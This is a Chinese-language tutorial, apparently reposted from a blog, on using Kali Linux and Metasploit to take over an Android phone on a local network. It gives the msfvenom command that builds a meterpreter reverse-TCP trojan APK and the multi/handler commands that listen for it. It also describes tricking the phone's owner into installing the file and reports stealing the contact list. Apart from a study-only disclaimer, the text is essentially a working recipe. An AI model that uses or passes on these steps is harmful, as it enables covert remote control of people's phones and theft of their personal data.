渗透测试--使用kali入侵局域网手机实验

声明本文仅限于技术讨论与学习,严禁用于非法途径,否则后果自负。

原理:借助kali的Metasploit渗透测试框架生成远程木马,然后感染局域网内Android手机,从而实现对被渗透手机数据的读取等。

实验前准备

    kali虚拟机:192.168.0.102(攻击机)

    win10中间机:用于将kali生成的远程木马发送到Android手机中。

    Android手机:192.168.0.105(靶机)

    Xshell4:用于将在kali上生成的远程木马从kali中导到win10中间机中。

实验过程

一、kali生成远程木马

  1.利用msfvenom生成木马病毒,payload选择android/meterpreter/reverse_tcp,后接kali虚拟机的名字和端口:

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=8888 R > /root/android.apk

      

  2. 检查文件的生成:

      

二、木马传送

  利用win10中的Xshell4将kali中生成的android.apk传送到指定路径(本实验指定路径为F:),再诱导Android手机(靶机)安装。

  1.用Xshell4连接kali虚拟机并将android.apk传送到指定路径:

       

       

       

   2.将F盘下的android.apk诱导发送到目标靶机上安装。

    目标靶机上安装完成木马后会出现如下图标:

      

 三、目标攻击

  1.msf监听

    kali虚拟机终端依次执行以下命令:

      msfconsole        //启动msfconsole

      use exploit/multi/handler  //加载模块

      set payload android/meterpreter/reverse_tcp  //选择payload

      set LHOST 192.168.0.102

      set LPORT 8888

      exploit          //开始执行漏洞,开始监听,等待目标上线 

    

   在目标手机上点一下木马文件(没有页面),则可成功建立攻击会话:

    

   查看上述文件:

上述实验演示的是窃取目标靶机通讯录,如果对其他命令感兴趣的话可通过help命令自行尝试。

提醒本实验仅用于技术讨论与学习,严禁用于非法途径,否则后果自负。

原文地址:https://www.cnblogs.com/ljwhq/p/13755968.html